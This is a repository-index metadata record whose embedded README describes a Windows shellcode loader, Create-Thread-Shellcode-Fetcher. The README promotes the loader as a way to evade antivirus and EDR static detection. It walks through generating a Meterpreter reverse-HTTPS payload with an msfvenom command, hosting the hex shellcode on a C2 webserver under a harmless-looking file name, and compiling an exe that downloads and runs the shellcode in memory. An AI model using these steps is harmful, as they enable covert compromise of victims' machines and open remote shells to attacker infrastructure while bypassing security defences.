{"id":21278264,"url":"https://github.com/virtualalllocex/create-thread-shellcode-fetcher","last_synced_at":"2025-04-09T22:18:19.201Z","repository":{"id":45906356,"uuid":"474570591","full_name":"VirtualAlllocEx/Create-Thread-Shellcode-Fetcher","owner":"VirtualAlllocEx","description":"This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","archived":false,"fork":false,"pushed_at":"2023-05-25T02:48:55.000Z","size":2837,"stargazers_count":246,"open_issues_count":1,"forks_count":51,"subscribers_count":9,"default_branch":"main","last_synced_at":"2025-04-09T22:18:15.441Z","etag":null,"topics":["antivirus-evasion","bypass-antivirus","edr-bypass","msfvenom","shellcode-injection","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"C++","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/VirtualAlllocEx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2022-03-27T07:51:08.000Z","updated_at":"2025-02-16T23:12:12.000Z","dependencies_parsed_at":"2023-11-13T15:17:51.377Z","dependency_job_id":null,"html_url":"https://github.com/VirtualAlllocEx/Create-Thread-Shellcode-Fetcher","commit_stats":null,"previous_names":["virtualalllocex/shellcode-downloader-createthread-execution"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-
Shellcode-Fetcher/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/VirtualAlllocEx%2FCreate-Thread-Shellcode-Fetcher/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/VirtualAlllocEx","download_url":"https://codeload.github.com/VirtualAlllocEx/Create-Thread-Shellcode-Fetcher/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248119286,"owners_count":21050755,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","bypass-antivirus","edr-bypass","msfvenom","shellcode-injection","shellcode-loader"],"created_at":"2024-11-21T10:11:05.879Z","updated_at":"2025-04-09T22:18:19.182Z","avatar_url":"https://github.com/VirtualAlllocEx.png","language":"C++","readme":"# Create-Thread-Shellcode-Fetcher\nEven if you use, for example, **syscalls (native APIs)** to execute C2-shellcode with a .exe, you often have the problem that \nyour **compiled .exe** gets **statically flagged by the AV/EPP/EDR**. Often the reason for this is that the **C2-shellcode** \nhas to be directly **included as a string or as a .bin resource** in the C++ POC, and because of that the well-known C2-shellcode \n(e.g. Metasploit, CobaltStrike, Empire shellcode etc.) is statically flagged by the AV/EPP/EDR. \nThis means that, no matter which clever technique you would use to bypass prevention/detection in the context of API hooking, kernel callback functions etc., 
\nyour .exe POC will get flagged before you can ever execute it. Also, if you want to **compile a C++ POC** in Visual Studio it isn't possible to **include stageless shellcode** in a char string, because the string is **limited in length** (always stay stageless if possible 😉). \n\nFrom my experience, depending on the AV/EPP/EDR, it often isn't the most important thing to only care about how to bypass the dynamic prevention/detection of an AV/EPP/EDR. At least equally important is to care about how I could bypass the static prevention/detection, to maybe break the chain of a possibly following connected dynamic or in-memory prevention/detection. \n\n**This POC gives you the possibility to compile a .exe that completely avoids static detection of your C2-shellcode by AV/EPP/EDR, and to download and execute your C2-shellcode which is hosted on your (C2)-webserver.**\n\n![image](https://user-images.githubusercontent.com/50073731/160274700-173f342f-1fd8-4080-8e78-d832129a99c6.png)\n\nWith this POC we have the advantage that the shellcode for the C2 reverse shell isn't included as a string or as a .bin file in the POC.\nThrough that, we don't have the problem of static detection of the C2 shellcode by an AV/EPP/EDR, because the complete C2-shellcode is hosted \non a webserver. \n\n\n\n**1. Creating stageless shellcode with MSF-Venom**\n\n**kali\u003e** msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.0.1 LPORT=443 -f c --arch x64 --platform windows -o /tmp/meterx64.c\n\n![image](https://user-images.githubusercontent.com/50073731/160274011-82fd0f13-a52c-4f90-93bd-01d39a9872d9.png)\n\n\n\n**2. Hosting the file with MSF stageless shellcode on a webserver**\n\nBased on the code in the C++ POC, the hosted shellcode must be in HEX format. To bring the whole MSF-shellcode onto one line, you can use the line operation function in Notepad++ (Join Lines) and then remove the spaces and the double quotes in the string. 
Only at the beginning and the end\nof the HEX-shellcode string do we need double quotes.\n\n![image](https://user-images.githubusercontent.com/50073731/160274172-4a793332-db0d-465f-b6e9-aa3cf024c8a3.png)\n\n![image](https://user-images.githubusercontent.com/50073731/160843980-56d60e17-de71-4505-a847-4fa1d3f51032.png)\n\n![image](https://user-images.githubusercontent.com/50073731/160844266-8a9b2e0c-1bcb-4122-97aa-6eca529e9d46.png)\n\nAt the end you can save the file with the stageless MSF-shellcode as a file without any file extension; we call it for example **update** and then upload the MSF-shellcode file to your webserver of choice. \n\n**3. Change the link in the C++ POC to your MSF-payload**\nIn this step we change the link in the POC to the link of the webserver on which we have hosted our stageless MSF-shellcode and compile\nit in **Visual Studio as Release x64**.\n\n![image](https://user-images.githubusercontent.com/50073731/160274705-7c608ab1-1137-4f0f-8152-8a722de6a270.png)\n\n**After compiling with VS you have an x64 binary which does not contain any C2-shellcode string or .bin file at all. After execution \nthe C2-shellcode is downloaded and executed in the memory of the targeted host.** \nAt the moment the execution of the shellcode using CreateThread is done with WIN32 APIs.\nBut despite not using syscalls, the POC will do a nice job 😉.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvirtualalllocex%2Fcreate-thread-shellcode-fetcher/lists"}